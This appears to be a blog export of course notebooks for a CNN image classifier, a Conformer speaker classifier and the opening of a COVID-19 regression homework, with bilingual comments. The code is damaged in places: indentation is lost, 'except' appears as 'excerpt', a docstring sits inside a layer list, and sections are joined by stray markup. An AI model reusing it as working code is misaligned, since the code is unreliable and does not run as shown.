    100%|██████████| 1031/1031 [00:01<00:00, 533.21it/s]

    Write prediction to a CSV file.

    After finish running this block, download the file prediction.csv from the files section on the left-hand side and submit it to Kaggle.

    with open('prediction.csv', 'w') as f:
    f.write('Id,Class\n')
    for i, y in enumerate(pred):
    f.write('{},{}\n'.format(i, y))

    HW3 Image Classification

    Solve image classification with convolutional neural networks(CNN).

    使用卷积神经网络处理图像分类问题。

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check GPU type.
    !nvidia-smi
    Tue May  2 10:05:59 2023       +-----------------------------------------------------------------------------+| NVIDIA-SMI 470.161.03   Driver Version: 470.161.03   CUDA Version: 11.4     ||-------------------------------+----------------------+----------------------+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC || Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. ||                               |                      |               MIG M. ||===============================+======================+======================||   0  Tesla P100-PCIE...  Off  | 00000000:00:04.0 Off |                    0 || N/A   33C    P0    25W / 250W |      0MiB / 16280MiB |      0%      Default ||                               |                      |                  N/A |+-------------------------------+----------------------+----------------------+                                                                               +-----------------------------------------------------------------------------+| Processes:                                                                  ||  GPU   GI   CI        PID   Type   Process name                  GPU Memory ||        ID   ID                                                   Usage      ||=============================================================================||  No running processes found                                                 |+-----------------------------------------------------------------------------+

    Import Packages

    _exp_name = "sample"
    # Import necessary packages.
    import numpy as np
    import pandas as pd
    import torch
    import os
    import torch.nn as nn
    import torchvision.transforms as transforms
    from PIL import Image
    # "ConcatDataset" and "Subset" are possibly useful when doing semi-supervised learning.
    # 在进行半监督学习时,“ConcatDataset”和“Subset”可能很有用。
    from torch.utils.data import ConcatDataset, DataLoader, Subset, Dataset
    from torchvision.datasets import DatasetFolder, VisionDataset
    # This is for the progress bar.
    from tqdm.auto import tqdm
    import random
    myseed = 6666  # set a random seed for reproducibility
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(myseed)
    torch.manual_seed(myseed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed_all(myseed)

    Transforms

    # Normally, We don't need augmentations in testing and validation.
    # 通常情况下,我们不需要在测试和验证中进行增强。
    # All we need here is to resize the PIL image and transform it into Tensor.
    # 这里我们所需要的只是调整 PIL 图像的大小并将其转换为张量。
    test_tfm = transforms.Compose([
    transforms.Resize((128, 128)),
    transforms.ToTensor(),
    ])

    # However, it is also possible to use augmentation in the testing phase.
    # 然而,在测试阶段也可以使用增强功能。
    # You may use train_tfm to produce a variety of images and then test using ensemble methods
    # 您可以使用 train_tfm 生成各种图像,然后使用集成方法进行测试
    train_tfm = transforms.Compose([
    # Resize the image into a fixed shape (height = width = 128)
    transforms.Resize((128, 128)),
    # You may add some transforms here.

    # ToTensor() should be the last one of the transforms. ToTensor()应该是最后一个 transform。
    transforms.ToTensor(),
    ])

    Datasets

    class FoodDataset(Dataset):
    '''
    该类继承了 PyTorch 中的 Dataset 类,是将数据导入 PyTorch 模型中训练和测试所必需的组件之一
    '''

    def __init__(self,path,tfm=test_tfm,files = None):
    '''
    用于初始化该类,其中 path 是数据集的路径,tfm 是一个可选参数,代表数据预处理的方法(默认为 test_tfm),
    files 是一个可选参数,是指要加载的文件列表(默认为 None)。
    '''
    super(FoodDataset).__init__()
    self.path = path
    # 在初始化时,根据给定的路径获取图片文件列表 self.files,并排序,
    self.files = sorted([os.path.join(path,x) for x in os.listdir(path) if x.endswith(".jpg")])
    # 若 files 不为 None,则使用 files 中指定的文件列表。接着对输入图片进行数据预处理,并将其转化为张量。
    if files != None:
    self.files = files

    self.transform = tfm

    def __len__(self):
    '''
    获取该数据集的长度
    '''
    return len(self.files)

    def __getitem__(self,idx):
    '''
    用于获取指定索引 idx 的样本,并将其转换为模型所需的数据格式。
    '''
    # 该函数会根据 idx 获取 self.files 中对应位置的图片文件名 fname
    fname = self.files[idx]
    # 读取图片文件为 PIL.Image 格式的对象 im
    im = Image.open(fname)
    # 通过 transform 对象对 im 进行数据预处理,并将结果转换为 torch.Tensor 格式的张量
    im = self.transform(im)

    # 通过解析文件名 fname 获取样本的标签 label,若 fname 的名称格式不符,则将 label 设为 -1(test 数据集没有 label)。
    try:
    label = int(fname.split("/")[-1].split("_")[0])
    excerpt:
    label = -1 # test has no label

    return im,label

    Model

    class Classifier(nn.Module):
    def __init__(self):
    super(Classifier, self).__init__()
    # torch.nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding)
    # torch.nn.MaxPool2d(kernel_size, stride, padding)
    # input 維度 [3, 128, 128]
    self.cnn = nn.Sequential(
    nn.Conv2d(3, 64, 3, 1, 1), # [64, 128, 128]
    nn.BatchNorm2d(64),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [64, 64, 64]

    nn.Conv2d(64, 128, 3, 1, 1), # [128, 64, 64]
    nn.BatchNorm2d(128),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [128, 32, 32]

    nn.Conv2d(128, 256, 3, 1, 1), # [256, 32, 32]
    nn.BatchNorm2d(256),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [256, 16, 16]

    nn.Conv2d(256, 512, 3, 1, 1), # [512, 16, 16]
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [512, 8, 8]

    nn.Conv2d(512, 512, 3, 1, 1), # [512, 8, 8]
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2, 2, 0), # [512, 4, 4]
    )
    self.fc = nn.Sequential(
    nn.Linear(512*4*4, 1024),
    nn.ReLU(),
    nn.Linear(1024, 512),
    nn.ReLU(),
    nn.Linear(512, 11)
    )

    def forward(self, x):
    out = self.cnn(x)
    out = out.view(out.size()[0], -1) # flatten
    return self.fc(out)

    Configurations

    # "cuda" only when GPUs are available.
    device = "cuda" if torch.cuda.is_available() else "cpu"

    # Initialize a model, and put it on the device specified.
    model = Classifier().to(device)

    # The number of batch size.
    batch_size = 64

    # The number of training epochs.
    n_epochs = 8

    # If no improvement in 'patience' epochs, early stop.
    patience = 300

    # For the classification task, we use cross-entropy as the measurement of performance.
    criterion = nn.CrossEntropyLoss()

    # Initialize optimizer, you may fine-tune some hyperparameters such as learning rate on your own.
    optimizer = torch.optim.Adam(model.parameters(), lr=0.0003, weight_decay=1e-5)

    Dataloader

    # Construct train and valid datasets.
    # The argument "loader" tells how torchvision reads the data.
    train_set = FoodDataset("/kaggle/input/ml2023spring-hw3/train", tfm=train_tfm)
    train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)
    valid_set = FoodDataset("/kaggle/input/ml2023spring-hw3/valid", tfm=test_tfm)
    valid_loader = DataLoader(valid_set, batch_size=batch_size, shuffle=True, num_workers=0, pin_memory=True)

    Start Training

    # Initialize trackers, these are not parameters and should not be changed
    stale = 0
    best_acc = 0

    for epoch in range(n_epochs):

    # ---------- Training ----------
    # Make sure the model is in train mode before training.
    model.train()

    # These are used to record information in training.
    train_loss = []
    train_accs = []

    for batch in tqdm(train_loader):

    # A batch consists of image data and corresponding labels.
    imgs, labels = batch
    #imgs = imgs.half()
    #print(imgs.shape,labels.shape)

    # Forward the data. (Make sure data and model are on the same device.)
    logits = model(imgs.to(device))

    # Calculate the cross-entropy loss.
    # We don't need to apply softmax before computing cross-entropy as it is done automatically.
    # 在计算交叉熵之前,我们不需要应用 softmax,因为它是自动完成的。
    loss = criterion(logits, labels.to(device))

    # Gradients stored in the parameters in the previous step should be cleared out first.
    # 应首先清除上一步中存储在参数中的梯度。
    optimizer.zero_grad()

    # Compute the gradients for parameters.
    loss.backward()

    # Clip the gradient norms for stable training.
    '''
    该代码调用了 PyTorch 中 nn.utils.clip_grad_norm_() 方法,该方法旨在对梯度进行截断,并返回一个梯度范数。
    该方法接收两个参数:第一个参数是模型的参数,即 model.parameters(),
    第二个参数是一个 float 类型的变量,表示梯度的最大范数(即 L2 范数)。
    在这里,max_norm 的值被设置为 10。
    '''
    grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)

    # Update the parameters with computed gradients.
    optimizer.step()

    # Compute the accuracy for current batch.
    acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

    # Record the loss and accuracy.
    train_loss.append(loss.item())
    train_accs.append(acc)

    train_loss = sum(train_loss) / len(train_loss)
    train_acc = sum(train_accs) / len(train_accs)

    # Print the information.
    print(f"[ Train | {epoch + 1:03d}/{n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}")

    # ---------- Validation ----------
    # Make sure the model is in eval mode so that some modules like dropout are disabled and work normally.
    model.eval()

    # These are used to record information in validation.
    valid_loss = []
    valid_accs = []

    # Iterate the validation set by batches.
    for batch in tqdm(valid_loader):

    # A batch consists of image data and corresponding labels.
    imgs, labels = batch
    #imgs = imgs.half()

    # We don't need gradient in validation.
    # Using torch.no_grad() accelerates the forward process.
    with torch.no_grad():
    logits = model(imgs.to(device))

    # We can still compute the loss (but not the gradient).
    loss = criterion(logits, labels.to(device))

    # Compute the accuracy for current batch.
    acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

    # Record the loss and accuracy.
    valid_loss.append(loss.item())
    valid_accs.append(acc)
    #break

    # The average loss and accuracy for entire validation set is the average of the recorded values.
    valid_loss = sum(valid_loss) / len(valid_loss)
    valid_acc = sum(valid_accs) / len(valid_accs)

    # Print the information.
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # update logs
    if valid_acc > best_acc:
    with open(f"./{_exp_name}_log.txt","a"):
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f} -> best")
    else:
    with open(f"./{_exp_name}_log.txt","a"):
    print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


    # save models
    if valid_acc > best_acc:
    print(f"Best model found at epoch {epoch}, saving model")
    torch.save(model.state_dict(), f"{_exp_name}_best.ckpt") # only save best to prevent output memory exceed error
    best_acc = valid_acc
    stale = 0
    else:
    stale += 1
    if stale > patience:
    print(f"No improvment {patience} consecutive epochs, early stopping")
    break
      0%|          | 0/157 [00:00<?, ?it/s][ Train | 001/008 ] loss = 1.87167, acc = 0.34385  0%|          | 0/57 [00:00<?, ?it/s][ Valid | 001/008 ] loss = 1.87423, acc = 0.34339[ Valid | 001/008 ] loss = 1.87423, acc = 0.34339 -> bestBest model found at epoch 0, saving model

    ……

    [ Train | 008/008 ] loss = 0.66352, acc = 0.77070  0%|          | 0/57 [00:00<?, ?it/s][ Valid | 008/008 ] loss = 1.28541, acc = 0.58910[ Valid | 008/008 ] loss = 1.28541, acc = 0.58910

    Dataloader for test

    # Construct test datasets.
    # The argument "loader" tells how torchvision reads the data.
    test_set = FoodDataset("/kaggle/input/ml2023spring-hw3/test", tfm=test_tfm)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=0, pin_memory=True)

    Testing and generate prediction CSV

    model_best = Classifier().to(device)
    model_best.load_state_dict(torch.load(f"{_exp_name}_best.ckpt"))
    model_best.eval()
    prediction = []
    with torch.no_grad():
    for data,_ in tqdm(test_loader):
    test_pred = model_best(data.to(device))
    test_label = np.argmax(test_pred.cpu().data.numpy(), axis=1)
    prediction += test_label.squeeze().tolist()
      0%|          | 0/47 [00:00<?, ?it/s]
    #create test csv
    def pad4(i):
    return "0"*(4-len(str(i)))+str(i)
    df = pd.DataFrame()
    df["Id"] = [pad4(i) for i in range(len(test_set))]
    df["Category"] = prediction
    df.to_csv("submission.csv",index = False)

    HW4 Self-attention

    # ---初始化---
    import numpy as np
    import torch
    import random

    def set_seed(seed):
    np.random.seed(seed)
    random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.deterministic = True

    set_seed(114514)
    # --- Dataset ---
    import os
    import json
    import torch
    import random
    from pathlib import Path
    from torch.utils.data import Dataset
    from torch.nn.utils.rnn import pad_sequence

    class myDataset(Dataset):
    def __init__(self, data_dir, segment_len=128):
    '''
    data_dir 是指音频文件的路径
    segment_len 是指每个音频片段的长度(默认为 128)
    '''
    self.data_dir = data_dir
    self.segment_len = segment_len

    # 加载从名字到 id 的映射 读取数据集文件夹中的 mapping.json
    mapping_path = Path(data_dir) / "mapping.json"
    mapping = json.load(mapping_path.open())
    self.speaker2id = mapping["speaker2id"] # 演讲者名称到 ID

    # 加载元数据
    metadata_path = Path(data_dir) / "metadata.json"
    metadata = json.load(open(metadata_path))["speakers"] # 包含了所有演讲者的语音数据信息

    # Get the total number of speaker.
    self.speaker_num = len(metadata.keys())
    self.data = []

    # 建立语音->ID 的数据
    for speaker in metadata.keys(): # 遍历 metadata.json 文件中 speakers 字段中的所有键值对
    for utterances in metadata[speaker]:
    # 将形如 [utterances["feature_path"], self.speaker2id[speaker]] 的数据添加到 self.data 中
    self.data.append([utterances["feature_path"], self.speaker2id[speaker]])


    def __len__(self):
    '''
    返回音频片段数量
    '''
    return len(self.data)

    def __getitem__(self, index):
    feat_path, speaker = self.data[index]
    # 元数据的语音 & 名字 ID
    # 打开音频文件?
    mel = torch.load(os.path.join(self.data_dir,feat_path))

    # 将 mel-spectrogram 分割成 长度为"segment_len" 帧.
    if len(mel) > self.segment_len:
    # 随机截取一段,先随机起点,然后开读
    start = random.randint(0, len(mel) - self.segment_len)
    mel = torch.FloatTensor(mel[start:start+self.segment_len])
    else:
    mel = torch.FloatTensor(mel)
    # 强转转成 long
    speaker = torch.FloatTensor([speaker]).long()
    # 返回真音频 ID
    return mel, speaker

    def get_speaker_number(self):
    '''
    返回数据集中演讲者数量
    '''
    return self.speaker_num
    # --- Dataloader ---
    import torch
    from torch.utils.data import DataLoader, random_split
    from torch.nn.utils.rnn import pad_sequence


    def collate_batch(batch):
    # Process features within a batch.
    """Collate a batch of data."""
    mel, speaker = zip(*batch)
    # 因为我们一批一批地训练模型,所以我们需要在同一批中填充特征,以使它们的长度相同。
    # 对于较短的 mel 音频特征,pad_sequence 函数会自动添加 0 填充。
    # 这样,在训练神经网络时,不同长度的 mel 特征就可以组成一个 batch 进行训练了。
    # Because we train the model batch by batch, we need to pad the features in the same batch to make their lengths the same.
    mel = pad_sequence(mel, batch_first=True, padding_value=-20) # pad log 10^(-20) which is very small value.
    # mel: (batch size, length, 40)
    return mel, torch.FloatTensor(speaker).long()


    def get_dataloader(data_dir, batch_size, n_workers):
    """
    Generate dataloader
    data_dir:数据集路径
    batch_size:batch 大小
    n_workers:读取数据的线程数
    """
    dataset = myDataset(data_dir)
    speaker_num = dataset.get_speaker_number()
    # 分割数据
    trainlen = int(0.9 * len(dataset))
    lengths = [trainlen, len(dataset) - trainlen]
    trainset, validset = random_split(dataset, lengths)

    train_loader = DataLoader(
    trainset, # 数据集
    batch_size=batch_size, # 每个 batch 的大小
    shuffle=True, #traindata 随机排序
    num_workers=n_workers, # 加载数据时所使用的 CPU 线程数
    drop_last=True, # 如果最后一个 batch 的样本数小于 batch_size,则丢弃该 batch
    pin_memory=True, # 将内存固定到 GPU 上,加快数据传输
    collate_fn=collate_batch, # 对每个 batch 中的数据进行批处理和填充,具体实现由 collate_batch 函数完成
    )
    valid_loader = DataLoader(
    validset,
    batch_size=batch_size,
    num_workers=n_workers,
    drop_last=True,
    pin_memory=True,
    collate_fn=collate_batch,
    )

    return train_loader, valid_loader, speaker_num
    # --- Model ---
    !pip install conformer
    import torch
    import torch.nn as nn
    import torch.nn.functional as F
    from conformer import ConformerBlock

    class Classifier(nn.Module):
    def __init__(self, d_model=256, n_spks=600, dropout=0.2):
    '''
    该模型是一个语音分类器,用于将语音信号分为不同的说话人。
    其中,d_model 表示特征维度,n_spks 表示说话人的数量,dropout 表示 dropout 概率。
    '''
    super().__init__()
    # input -> d_model
    '''
    Prenet:通过一个全连接层对输入的 mel 音频特征进行转换,将 40 维的 mel 特征转化为 d_model 维的表示。
    '''
    self.prenet = nn.Linear(40, d_model)

    # self.encoder_layer = nn.TransformerEncoderLayer(
    # d_model=d_model, dim_feedforward=256, nhead=2
    # )
    # self.encoder = nn.TransformerEncoder(self.encoder_layer, num_layers=2)
    # transformer 不行,不如 conformer
    '''
    Encoder:使用 ConformerBlock 实现的编码器,将 Prenet 输出的 mel 音频特征序列编码成固定长度的向量,以便进行分类。
    该编码器在多头 self-attention 机制的基础上,结合了深度可分离卷积,使用多层非线性变换对输入进行处理,提取更加抽象的特征表示。
    '''
    self.encoder=ConformerBlock(
    dim=d_model,
    dim_head=4,
    heads=4, # attension 层头数?
    ff_mult=4, # 在 feed forward network 作为乘数的参数
    conv_expansion_factor=2, #在卷积层中作成乘数的参数
    conv_kernel_size=20,
    attn_dropout=dropout, # attendsion 层
    ff_dropout=dropout, # feed forward 层
    conv_dropout=dropout # 卷积层
    )
    # Project the the dimension of features from d_model into speaker nums.
    # 将 d_model 中的特征尺寸投影到 speaker 的编号中。
    self.pred_layer = nn.Sequential(
    '''
    Pred_layer:用于预测说话人标签的全连接神经网络
    '''
    nn.BatchNorm1d(d_model), # 对小批量 e2d 或 3d 输入进行批标准化
    nn.Linear(d_model, d_model), # 过两层全连接层将其映射到 n_spks 维的向量
    nn.Sigmoid(), # 通过 sigmoid 函数将每个维度的值限制在 [0, 1] 范围内
    nn.Linear(d_model, n_spks), # 最后一层采用线性变换输出分类结果
    )

    def forward(self, mels):
    """
    args:
    mels: (batch size, length, 40)
    return:
    out: (batch size, n_spks)
    """
    # out: (batch size, length, d_model)
    '''
    在前向传播过程中,首先将输入的 mels 序列通过 Prenet 层进行特征转换,
    得到一个形状为 (batch size, length, d_model) 的张量 out,其中 d_model 表示特征维度
    '''
    out = self.prenet(mels) # 先上到 d_model
    # out: (length, batch size, d_model)
    '''
    通过调用 out.permute(1, 0, 2) 将其第一维和第二维交换位置,变成形状为 (length, batch size, d_model) 的张量,
    以符合编码器 ConformerBlock 对输入的要求
    '''
    out = out.permute(1, 0, 2) # 变形
    # The encoder layer expect features in the shape of (length, batch size, d_model).
    '''
    将 out 作为编码器的输出传入 self.encoder 中,得到一个 shape 为 (length, batch size, d_model) 的张量 out
    这里使用的是 ConformerBlock 编码器,它采用了改进的 Transformer 结构,
    在原有的自注意力机制的基础上加入了深度可分离卷积以及位置相关的 Feed-Forward 结构,能够更好地捕捉语音信号的时序特征。
    '''
    out = self.encoder(out) # encoder 就得酱紫,怪捏
    # out: (batch size, length, d_model)
    '''
    将 out 再次变形,将其第一维和第二维交换回来形成一个 shape 为 (batch size, length, d_model) 的张量
    '''
    out = out.transpose(0, 1) # 再变形
    # mean pooling
    '''
    对该张量沿着第一维做 mean pooling 操作,
    生成一个 shape 为 (batch size, d_model) 的统计量 stats,代表了该批次中每个音频序列的平均特征向量
    '''
    stats = out.mean(dim=1) # 取第 1 维的平均

    # out: (batch, n_spks)
    '''
    将 stats 作为输入传入全连接神经网络模型 self.pred_layer,得到一个 (batch size, n_spks) 维的输出向量 out,
    其中 n_spks 表示说话人数量。该输出向量表示每个音频序列属于不同说话人的概率分布情况。
    '''
    out = self.pred_layer(stats)
    return out
    import math

    import torch
    from torch.optim import Optimizer
    from torch.optim.lr_scheduler import LambdaLR #注意这玩意

    ##学习率调整计划
    def get_cosine_schedule_with_warmup(
    optimizer: Optimizer, # 需要进行学习率调度的优化器对象。
    num_warmup_steps: int, # 学习率预热期的步长,也就是训练前需要逐步提高学习率的迭代次数。
    num_training_steps: int, # 训练总步长,也就是整个训练过程中的总迭代次数。
    num_cycles: float = 0.5, # 余弦函数波形的周期数量,默认值为 0.5,表示每个周期内有一个完整的余弦波形变化。
    last_epoch: int = -1, # 可选参数,可以指定学习率调度器在开始训练时的起始 epoch 值。
    ):
    def lr_lambda(current_step):
    '''
    函数内部采用了一个嵌套函数 lr_lambda,其输入为当前训练的步数 current_step。
    这个函数首先对前 num_warmup_steps 步采用线性递增的方式来提高学习率(因为在训练初期往往需要更小的学习率以避免模型梯度爆炸或消失)。
    '''
    # Warmup
    '''
    首先对前 num_warmup_steps 步采用线性递增的方式来提高学习率(因为在训练初期往往需要更小的学习率以避免模型梯度爆炸或消失)
    '''
    if current_step < num_warmup_steps:
    return float(current_step) / float(max(1, num_warmup_steps))
    # decadence
    '''
    在剩余的 num_training_steps 步中,学习率会随着训练步数的增加而不断地逐渐下降。
    '''
    progress = float(current_step - num_warmup_steps) / float(
    max(1, num_training_steps - num_warmup_steps)
    )
    return max(
    0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress))
    )
    '''
    将 lr_lambda 函数和相关参数使用 LambdaLR 类进行包装,并返回该实例对象供模型训练过程中进行学习率的调度。
    '''
    return LambdaLR(optimizer,lr_lambda,last_epoch)
    # 训练部分
    import torch

    def model_fn(batch, model, criterion, device):
    """Forward a batch through the model."""
    # model.train()
    # 拿数据环节
    mels, labels = batch
    mels = mels.to(device)
    labels = labels.to(device)
    # 求损失环节
    outs = model(mels)
    loss = criterion(outs, labels)
    # 返回概率最高的 speakerID
    preds = outs.argmax(1)
    # 求准确率
    accuracy = torch.mean((preds == labels).float())

    return loss, accuracy
    # 验证部分
    from tqdm import tqdm
    import torch


    def valid(dataloader, model, criterion, device):
    """Validate on validation set."""

    model.eval()
    running_loss = 0.0
    running_accuracy = 0.0
    pbar = tqdm(total=len(dataloader.dataset), ncols=0, desc="Valid", unit=" uttr")

    for i, batch in enumerate(dataloader):
    with torch.no_grad():
    loss, accuracy = model_fn(batch, model, criterion, device)
    running_loss += loss.item()
    running_accuracy += accuracy.item()

    pbar.update(dataloader.batch_size)
    pbar.set_postfix(
    loss=f"{running_loss / (i+1):.2f}",
    accuracy=f"{running_accuracy / (i+1):.2f}",
    )

    pbar.close()
    model.train()

    return running_accuracy / len(dataloader)
    from tqdm import tqdm
    import torch
    import torch.nn as nn
    from torch.optim import AdamW
    from torch.utils.data import DataLoader, random_split


    def parse_args():
    # 设定超参数
    config = {
    "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
    "save_path": "/kaggle/working/model.ckpt",
    "batch_size": 32,
    "n_workers": 8,
    "valid_steps": 2000,
    "warmup_steps": 1000,
    "save_steps": 10000,
    "total_steps": 70000,
    }

    return config


    def main(
    data_dir,
    save_path,
    batch_size,
    n_workers,
    valid_steps,
    warmup_steps,
    total_steps,
    save_steps,
    ):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    train_loader, valid_loader, speaker_num = get_dataloader(data_dir, batch_size, n_workers)
    train_iterator = iter(train_loader)
    print(f"[Info]: Finish loading data!",flush = True)

    # 定义模型
    model = Classifier(n_spks=speaker_num).to(device)
    # 定义损失函数
    criterion = nn.CrossEntropyLoss()
    # 定义优化器
    optimizer = AdamW(model.parameters(), lr=1e-3)
    # 对优化器的学习率进行调整
    scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)
    print(f"[Info]: Finish creating model!",flush = True)

    model.load_state_dict(torch.load(f"/kaggle/input/hw4model3/model (3).ckpt"))

    best_accuracy = -1.0
    best_state_dict = None

    pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")
    torch.save(best_state_dict, save_path)
    for step in range(total_steps):
    # Get data
    try:
    batch = next(train_iterator)
    excerpt StopIteration:
    train_iterator = iter(train_loader)
    batch = next(train_iterator)

    loss, accuracy = model_fn(batch, model, criterion, device)
    batch_loss = loss.item()
    batch_accuracy = accuracy.item()

    # Updata model
    loss.backward()
    optimizer.step()
    scheduler.step()
    optimizer.zero_grad()
    # Log
    pbar.update()
    pbar.set_postfix(
    loss=f"{batch_loss:.2f}",
    accuracy=f"{batch_accuracy:.2f}",
    step=step + 1,
    )

    # Do validation
    if (step + 1) % valid_steps == 0:
    pbar.close()

    valid_accuracy = valid(valid_loader, model, criterion, device)

    # keep the best model
    if valid_accuracy > best_accuracy:
    best_accuracy = valid_accuracy
    best_state_dict = model.state_dict()

    pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")

    # Save the best model so far.
    if (step + 1) % save_steps == 0 and best_state_dict is not None:
    torch.save(best_state_dict, save_path)
    pbar.write(f"Step {step + 1}, best model saved. (accuracy={best_accuracy:.4f})")

    pbar.close()


    if __name__ == "__main__":
    main(**parse_args())
    import json
    import csv
    from pathlib import Path
    from tqdm.notebook import tqdm

    import torch
    from torch.utils.data import DataLoader

    def parse_args():
    """arguments"""
    config = {
    "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
    "model_path": "/kaggle/working/model.ckpt",
    "output_path": "/kaggle/working/output.csv",
    }

    return config


    def main(
    data_dir,
    model_path,
    output_path,
    ):
    """Main function."""
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print(f"[Info]: Use {device} now!")

    mapping_path = Path(data_dir) / "mapping.json"
    mapping = json.load(mapping_path.open())

    dataset = InferenceDataset(data_dir)
    dataloader = DataLoader(
    dataset,
    batch_size=1,
    shuffle=False,
    drop_last=False,
    num_workers=8,
    collate_fn=inference_collate_batch,
    )
    print(f"[Info]: Finish loading data!",flush = True)

    speaker_num = len(mapping["id2speaker"])
    model = Classifier(n_spks=speaker_num).to(device)
    model.load_state_dict(torch.load(model_path))
    model.eval()
    print(f"[Info]: Finish creating model!",flush = True)

    results = [["Id", "Category"]]
    for feat_paths, mels in tqdm(dataloader):
    with torch.no_grad():
    mels = mels.to(device)
    outs = model(mels)
    preds = outs.argmax(1).cpu().numpy()
    for feat_path, pred in zip(feat_paths, preds):
    results.append([feat_path, mapping["id2speaker"][str(pred)]])

    with open(output_path, 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    writer.writerows(results)


    if __name__ == "__main__":
    main(**parse_args())
    # ---下面就是交数据啦—--
    import os
    import json
    import torch
    from pathlib import Path
    from torch.utils.data import Dataset


    class InferenceDataset(Dataset):
    def __init__(self, data_dir):
    testdata_path = Path(data_dir) / "testdata.json"
    metadata = json.load(testdata_path.open())
    self.data_dir = data_dir
    self.data = metadata["utterances"]

    def __len__(self):
    return len(self.data)

    def __getitem__(self, index):
    utterance = self.data[index]
    feat_path = utterance["feature_path"]
    mel = torch.load(os.path.join(self.data_dir, feat_path))

    return feat_path, mel


    def inference_collate_batch(batch):
    """Collate a batch of data."""
    feat_paths, mels = zip(*batch)

    return feat_paths, torch.stack(mels)

    ]]>
    + Homework 1: COVID-19 Cases Prediction (Regression)

    Objectives:

    • Solve a regression problem with deep neural networks (DNN).
      • 用 DNN 解决回归问题
    • Understand basic DNN training tips.
      • 了解 DNN 的训练技巧
    • Familiarize yourself with PyTorch.
      • 熟悉 Pytorch

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    1
    2
    # check gpu type
    !nvidia-smi
    Tue May  2 06:43:11 2023       +-----------------------------------------------------------------------------+| NVIDIA-SMI 525.85.12    Driver Version: 525.85.12    CUDA Version: 12.0     ||-------------------------------+----------------------+----------------------+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC || Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. ||                               |                      |               MIG M. ||===============================+======================+======================||   0  Tesla T4            Off  | 00000000:00:04.0 Off |                    0 || N/A   60C    P8    11W /  70W |      0MiB / 15360MiB |      0%      Default ||                               |                      |                  N/A |+-------------------------------+----------------------+----------------------+                                                                               +-----------------------------------------------------------------------------+| Processes:                                                                  ||  GPU   GI   CI        PID   Type   Process name                  GPU Memory ||        ID   ID                                                   Usage      ||=============================================================================||  No running processes found                                                 |+-----------------------------------------------------------------------------+

    Download data

    If the Google Drive links below do not work, you can use the dropbox link below or download data from Kaggle, and upload data manually to the workspace.

    如果下面的 Google Drive 链接不起作用,您可以使用下面的 dropbox 链接或从 Kaggle 下载数据,然后手动将数据上传到工作区。

    1
    2
    3
    4
    5
    6
    7
    # google drive link
    # !gdown --id '1BjXalPZxq9mybPKNjF3h5L3NcF7XKTS-' --output covid_train.csv
    # !gdown --id '1B55t74Jg2E5FCsKCsUEkPKIuqaY7UIi1' --output covid_test.csv

    # dropbox link
    !wget -O covid_train.csv https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
    !wget -O covid_test.csv https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
